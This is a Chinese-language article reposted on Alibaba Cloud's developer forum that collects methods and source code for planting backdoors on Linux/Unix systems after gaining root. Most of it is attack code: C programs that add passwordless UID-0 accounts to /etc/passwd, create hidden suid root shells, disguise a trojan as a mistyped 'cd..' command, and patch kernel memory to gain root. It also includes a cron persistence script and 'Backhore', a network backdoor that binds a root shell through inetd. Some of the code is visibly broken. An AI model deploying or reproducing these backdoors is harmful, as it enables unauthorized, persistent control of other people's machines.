创建linux/unix后门方法总结-阿里云开发者社区

开发者社区> 技术小美> 正文

创建linux/unix后门方法总结

简介:
+关注继续查看

 初级篇 

  最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。 
<++> backdoor/backdoor1.c 
#include 
main() 

FILE *fd; 
fd=fopen("/etc/passwd","a+"); 
fprintf(fd,"hax0r::0:0::/root:/bin/sh\\n"); 

<-->

比这种方法稍微隐蔽一点的就是将藏在口令文件中某个无人使用帐号的 UID 改为 0,并将其第二个域(口令域)设为空。(注意,如果你使用的是较高版本的*nix,也许还要修改 /etc/shadow 文件。)

在 /tmp 目录下放置 suid shell。以后只要你运行这个程序,就会轻易得到根用户权限。这种方法几乎是最受欢迎的了。但有许多系统每几小时,或者每次启动都会清除 /tmp 目录下的数据,另外一些系统则根本不允许运行 /tmp 目录下的 suid 程序。当然,你可以自己修改或清除这些限制(因为你已是根用户,有权限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)。以下是在 /tmp 目录下放置 suid shell 程序的C源程序。

<++> backdoor/backdoor2.c 
#include 
main() 

system("cp /bin/sh /tmp/fid"); 
system("chown root.root /tmp/fid"); 
system("chmod 4755 /tmp/fid"); 

<--> 
____________________________________________________________________
中级篇

超级服务器守护进程(inetd)的配置文件。系统管理员一般情况下不经常检查该文件,因此这倒是个放置“后门”的好地方。 那么在这里如何建立一个最好的后门呢?当然是远程的了。这样你就不必需要本地帐号就可以成为根用户了。首先,让我们先来了解一下这方面的基础知识:inetd 进程负责监听各个TCP和UDP端口的连接请求,并根据连接请求启动相应的服务器进程。该配置文件 /etc/inetd.conf 很简单,基本形式如下:

(1) (2) (3) (4) (5) (6) (7) 
ftp stream tcp nowait root /usr/etc/ftpd ftpd 
talk dgram udp wait root /usr/etc/ntalkd ntalkd 
mountd/1 stream rpc/tcp wait root /usr/etc/mountd mountd

1:第一栏是服务名称。服务名通过查询 /etc/services 文件(供 TCP 和 UDP 服务使用)或 portmap 守护进程(供 RPC 服务使用)映射成端口号。RPC(远程过程调用)服务由 name/num 的名字格式和第三栏中的 rpc 标志识别。 
2:第二栏决定服务使用的套接口类型:stream、dgram 或 raw。一般说来,stream 用于 TCP 服务,dgram 用于 UDP, raw 的使用很少见。 
3:第三栏标识服务使用的通信协议。允许的类型列在 protocols 文件中。协议几乎总是是 tcp 或 udp。RPC 服务在协议类型前冠以 rpc/。 
4:如果所说明的服务一次可处理多个请求(而不是处理一个请求后就退出),那么第四栏应置成 wait,这样可以阻止 inetd 持续地派生该守护进程的新拷贝。此选项用于处理大量的小请求的服务。如果 wait 不合适,那么在本栏中填 nowait。 
5:第五栏给出运行守护进程的用户名。 
6:第六栏给出守护进程的全限定路径名。 
7:守护进程的真实名字及其参数。

如果所要处理的工作微不足道(如不需要用户交互),inetd 守护进程便自己处理。此时第六、七栏只需填上 \'internal\' 即可。所以,要安装一个便利的后门,可以选择一个不常被使用的服务,用可以产生某种后门的守护进程代替原先的守护进程。例如,让其添加 UID 0 的帐号,或复制一个 suid shell。

一个比较好的方法之一,就是将用于提供日期时间的服务 daytime 替换为能够产生一个 suid root 的 shell。只要将 /etc/inetd.conf 文件中的:

daytime stream tcp nowait root internal

修改为:

daytime stream tcp nowait /bin/sh sh -i.

然后重启(记住:一定要重启)inetd 进程:

killall -9 inetd。

但更好、更隐蔽的方法是伪造网络服务,让它能够在更难以察觉的情况下为我们提供后门,例如口令保护等。如果能够在不通过 telnetd 连接的情况下轻松地进行远程访问,那是再好不过了。方法就是将“自己的”守护程序绑定到某个端口,该程序对外来连接不提供任何提示符,但只要直接输入了正确的口令,就能够顺利地进入系统。以下是这种后门的一个示范程序。(注:这个程序写得并不很完整。)

<++> backdoor/remoteback.c 
/* Coders: 
Theft

Help from: 
Sector9, Halogen

Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen, 
Psionic, g0d, Psionic. 
Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH), 
Global Hell(gH), Team Sploit, Hong Kong Danger Duo, 
Tg0d, EHAP. 
Usage: 
Setup: 
# gcc -o backhore backhore.c # ./backdoor password & 
Run: 
Telnet to the host on port 4000. After connected you 
Will not be prompted for a password, this way it is less 
Obvious, just type the password and press enter, after this 
You will be prompted for a command, pick 1-8.

Distributers: 
Ethical Mutiny Crew

*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include


#define PORT 4000 
#define MAXDATASIZE 100 
#define BACKLOG 10 
#define SA struct sockaddr

void handle(int);

int 
main(int argc, char *argv[]) 

int sockfd, new_fd, sin_size, numbytes, cmd;

char ask[10]="Command: "; 
char *bytes, *buf, pass[40]; 
struct sockaddr_in my_addr;

 

struct sockaddr_in their_addr;

printf("\\n Backhore BETA by Theft\\n"); 
printf(" 1: trojans rc.local\\n"); 
printf(" 2: sends a systemwide message\\n"); 
printf(" 3: binds a root shell on port 2000\\n"); 
printf(" 4: creates suid sh in /tmp\\n"); 
printf(" 5: creates mutiny account uid 0 no passwd\\n"); 
printf(" 6: drops to suid shell\\n"); 
printf(" 7: information on backhore\\n"); 
printf(" 8: contact\\n");

if (argc != 2) { 
fprintf(stderr,"Usage: %s password\\n", argv[0]); 
exit(1); 
}

strncpy(pass, argv[1], 40); 
printf("..using password: %s..\\n", pass);


if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { 
perror("socket"); 
exit(1); 
}

my_addr.sin_family = AF_INET; 
my_addr.sin_port = htons(PORT); 
my_addr.sin_addr.s_addr = INADDR_ANY;

if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {

perror("bind"); 
exit(1); 
}

if (listen(sockfd, BACKLOG) == -1) { 
perror("listen"); 
exit(1); 
}

sin_size = sizeof(SA); 
while(1) { /* main accept() loop */ 
if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) { 
perror("accept"); 
continue; 

if (!fork()) { 
dup2(new_fd, 0); 
dup2(new_fd, 1); 
dup2(new_fd, 2); 
fgets(buf, 40, stdin); 
if (!strcmp(buf, pass)) { 
printf("%s", ask); 
cmd = getchar(); 
handle(cmd); 

close(new_fd); 
exit(0); 

close(new_fd); 
while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */ 

}


void 
handle(int cmd) 

FILE *fd;

case \'1\': 
printf("\\nBackhore BETA by Theft\\n"); 
printf("theft@cyberspace.org\\n"); 
printf("Trojaning rc.local\\n"); 
fd = fopen("/etc/passwd", "a+"); 
fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh"); 
fclose(fd); 
printf("Trojan complete.\\n"); 
break; 
case \'2\': 
printf("\\nBackhore BETA by Theft\\n"); 
printf("theft@cyberspace.org\\n"); 
printf("Sending systemwide message..\\n"); 
system("wall Box owned via the Ethical Mutiny Crew"); 
printf("Message sent.\\n"); 
break; 
case \'3\': 
printf("\\nBackhore BETA by Theft\\n"); 
printf("theft@cyberspace.org\\n"); 
printf("\\nAdding inetd backdoor... (-p)\\n"); 
fd = fopen("/etc/services","a+"); 
fprintf(fd,"backdoor\\t2000/tcp\\tbackdoor\\n"); 
fd = fopen("/etc/inetd.conf","a+"); 
fprintf(fd,"backdoor\\tstream\\ttcp\\tnowait\\troot\\t/bin/sh -i\\n"); 
execl("killall", "-HUP", "inetd", NULL); 
printf("\\ndone.\\n"); 
printf("telnet to port 2000\\n\\n"); 
break; 
case \'4\': 
printf("\\nBackhore BETA by Theft\\n"); 
printf("theft@cyberspace.org\\n"); 
printf("\\nAdding Suid Shell... (-s)\\n"); 
system("cp /bin/sh /tmp/.sh"); 
system("chmod 4700 /tmp/.sh"); 
system("chown root:root /tmp/.sh"); 
printf("\\nSuid shell added.\\n"); 
printf("execute /tmp/.sh\\n\\n"); 
break; 
case \'5\': 
printf("\\nBackhore BETA by Theft\\n"); 
printf("theft@cyberspace.org\\n"); 
printf("\\nAdding root account... (-u)\\n"); 
fd=fopen("/etc/passwd","a+");

fprintf(fd,"hax0r::0:0::/:/bin/bash\\n"); 
printf("\\ndone.\\n"); 
printf("uid 0 and gid 0 account added\\n\\n"); 
break; 
case \'6\': 
printf("\\nBackhore BETA by Theft\\n"); 
printf("theft@cyberspace.org\\n"); 
printf("Executing suid shell..\\n");

 

execl("/bin/sh"); 
break; 
case \'7\': 
printf("\\nBackhore BETA by Theft\\n"); 
printf("theft@cyberspace.org\\n"); 
printf("\\nInfo... (-i)\\n"); 
printf("\\n3 - Adds entries to /etc/services & /etc/inetd.conf giving you\\n"); 
printf("a root shell on port 2000. example: telnet 2000\\n\\n"); 
printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever\\n"); 
printf("executed gives you a root shell. example:/tmp/.sh\\n\\n"); 
printf("5 - Adds an account with uid and gid 0 to the passwd file.\\n"); 
printf("The login is \'mutiny\' and there is no passwd."); 
break; 
case \'8\': 
printf("\\nBackhore BETA by Theft\\n"); 
printf("\\_blank>http://theft.bored.org\\n"); 
printf("theft@cyberspace.org\\n\\n"); 
break; 
default: 
printf("unknown command: %d\\n", cmd); 
break; 


<-->

高级篇

Crontab 程序对于系统管理员来说是非常有用的。Cron 服务用于计划程序在特定时间(月、日、周、时、分)运行。如果你足够聪明,就应该加以利用,使之为我们制造“后门”!通过 Cron 服务,你可以让它在每天凌晨 2:00 (这个时候网管应该睡觉了吧。)运行后门程序,使你能够轻易进入系统干你想干的事,并在网管起来之前退出系统。根用户的 crontab 文件放在 /var/spool/crontab/root 中,其格式如下:

(1) (2) (3) (4) (5) (6) 
0 0 * * 3 /usr/bin/updatedb

1. 分钟 (0-60) 
2. 小时 (0-23) 
3. 日 (1-31) 
4. 月 (1-12) 
5. 星期 (1-7) 
6. 所要运行的程序

以上内容设置该程序于每星期三 0:0 运行。要在 cron 建立后门,只需在 /var/spool/crontab/root 中添加后门程序即可。例如该程序可以在每天检查我们在 /etc/passwd 文件中增加了用户帐号是否仍然有效。以下是程序示例:

0 0 * * * /usr/bin/retract

<++> backdoor/backdoor.sh 
#!/bin/csh

set evilflag = (****grep eviluser /etc/passwd****)


if($#evilflag == 0) then

set linecount = ****wc -l /etc/passwd**** 
cd 
cp /etc/passwd ./temppass 
@ linecount[1] /= 2 
@ linecount[1] += 1 
split -$linecount[1] ./temppass 
echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa 
cat ./xab >> ./xaa 
mv ./xaa /etc/passwd 
chmod 644 /etc/passwd 
rm ./xa* ./temppass 
echo Done... 
else 
endif 
<-->


[综合]

当然,我们可以编写木马程序,并把它放到 /bin 目录下。当以特定命令行参数运行时将产生一个 suid shell。以下是程序示例:

<++> backdoor/backdoor3.c 
#include 
#define pass "triad" 
#define BUFFERSIZE 6

int main(argc, argv) 
int argc; 
char *argv[];{

int i=0;

if(argv[1]){

if(!(strcmp(pass,argv[1]))){


system("cp /bin/csh /bin/.swp121"); 
system("chmod 4755 /bin/.swp121"); 
system("chown root /bin/.swp121"); 
system("chmod 4755 /bin/.swp121"); 

}

printf("372f: Invalid control argument, unable to initialize. Retrying"); 
for(;i<10;i++){ 
fprintf(stderr,"."); 
sleep(1); 

printf("\\nAction aborted after 10 attempts.\\n"); 
return(0); 

<-->


[变种]

以下程序通过在内存中寻找你所运行程序的 UID,并将其改为 0,这样你就有了一个 suid root shell 了。

<++> backdoor/kmemthief.c 
#include 
#include 
#include 
#include 
#include 
#include 
#include

#define pass "triad"

struct user userpage; 
long address(), userlocation;

int main(argc, argv, envp) 
int argc; 
char *argv[], *envp[];{

int count, fd; 
long where, lseek();

if(argv[1]){ 
if(!(strcmp(pass,argv[1]))){

fd=(open("/dev/kmem",O_RDWR);

 

if(fd<0){ 
printf("Cannot read or write to 
/dev/kmem\\n"); 
perror(argv); 
exit(10); 
}

userlocation=address(); 
where=(lseek(fd,userlocation,0);

if(where!=userlocation){ 
printf("Cannot seek to user page\\n"); 
perror(argv); 
exit(20); 
}

count=read(fd,&userpage,sizeof(struct user));

if(count!=sizeof(struct user)){ 
printf("Cannot read user page\\n"); 
perror(argv); 
exit(30); 
}

printf("Current UID: %d\\n",userpage.u_ruid); 
printf("Current GID: %d\\n",userpage.g_ruid);

userpage.u_ruid=0; 
userpage.u_rgid=0;

where=lseek(fd,userlocation,0);

if(where!=userlocation){ 
printf("Cannot seek to user page\\n"); 
perror(argv); 
exit(40); 
}

write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));

execle("/bin/csh","/bin/csh","-i",(char *)0, envp); 

}


<-->


[“笨”方法]

你有没有曾经试过在 UNIX 系统下错把 "cd .." 输入为 "cd.."?这是由于使用 MS Windows 和 MS-DOS 养成的习惯。这种错误网管是否也会犯呢?如果是这样的话,可不可以让他为我们做点“贡献”呢? 例如当他输入 "cd.." 时,会激活我们的木马程序。这样我们就不必登录到系统去激活木马了。以下是程序示例:

<++> backdoor/dumb.c 
/* 
本程序可在管理员偶然地输入 cd.. 时向 /etc/passwd 文件添加一个 UID 0 帐号。但同时它也实现 cd .. 功能,从而骗过管理员。 
*/

#include 
#include

main() 

FILE *fd; 
fd=fopen("/etc/passwd","a+"); 
fprintf(fd,"hax0r::0:0::/root:/bin/sh\\n"); 
system("cd"); 

<-->

 





















本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/354563,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
阿里云服务器怎么设置密码?怎么停机?怎么重启服务器?
如果在创建实例时没有设置密码,或者密码丢失,您可以在控制台上重新设置实例的登录密码。本文仅描述如何在 ECS 管理控制台上修改实例登录密码。
9042 0
阿里云服务器ECS远程登录用户名密码查询方法
阿里云服务器ECS远程连接登录输入用户名和密码,阿里云没有默认密码,如果购买时没设置需要先重置实例密码,Windows用户名是administrator,Linux账号是root,阿小云来详细说下阿里云服务器远程登录连接用户名和密码查询方法
11097 0
阿里云服务器端口号设置
阿里云服务器初级使用者可能面临的问题之一. 使用tomcat或者其他服务器软件设置端口号后,比如 一些不是默认的, mysql的 3306, mssql的1433,有时候打不开网页, 原因是没有在ecs安全组去设置这个端口号. 解决: 点击ecs下网络和安全下的安全组 在弹出的安全组中,如果没有就新建安全组,然后点击配置规则 最后如上图点击添加...或快速创建.   have fun!  将编程看作是一门艺术,而不单单是个技术。
10716 0
使用SSH远程登录阿里云ECS服务器
远程连接服务器以及配置环境
2443 0
使用OpenApi弹性释放和设置云服务器ECS释放
云服务器ECS的一个重要特性就是按需创建资源。您可以在业务高峰期按需弹性的自定义规则进行资源创建,在完成业务计算的时候释放资源。本篇将提供几个Tips帮助您更加容易和自动化的完成云服务器的释放和弹性设置。
11984 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,阿里云优惠总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系.
12727 0
腾讯云服务器 设置ngxin + fastdfs +tomcat 开机自启动
在tomcat中新建一个可以启动的 .sh 脚本文件 /usr/local/tomcat7/bin/ export JAVA_HOME=/usr/local/java/jdk7 export PATH=$JAVA_HOME/bin/:$PATH export CLASSPATH=.
4592 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,云吞铺子总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系统盘、创建快照、配置安全组等操作如何登录ECS云服务器控制台? 1、先登录到阿里云ECS服务器控制台 2、点击顶部的“控制台” 3、通过左侧栏,切换到“云服务器ECS”即可,如下图所示 通过ECS控制台的远程连接来登录到云服务器 阿里云ECS云服务器自带远程连接功能,使用该功能可以登录到云服务器,简单且方便,如下图:点击“远程连接”,第一次连接会自动生成6位数字密码,输入密码即可登录到云服务器上。
21807 0
+关注
6906
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
《2021云上架构与运维峰会演讲合集》
立即下载
《零基础CSS入门教程》
立即下载
《零基础HTML入门教程》
立即下载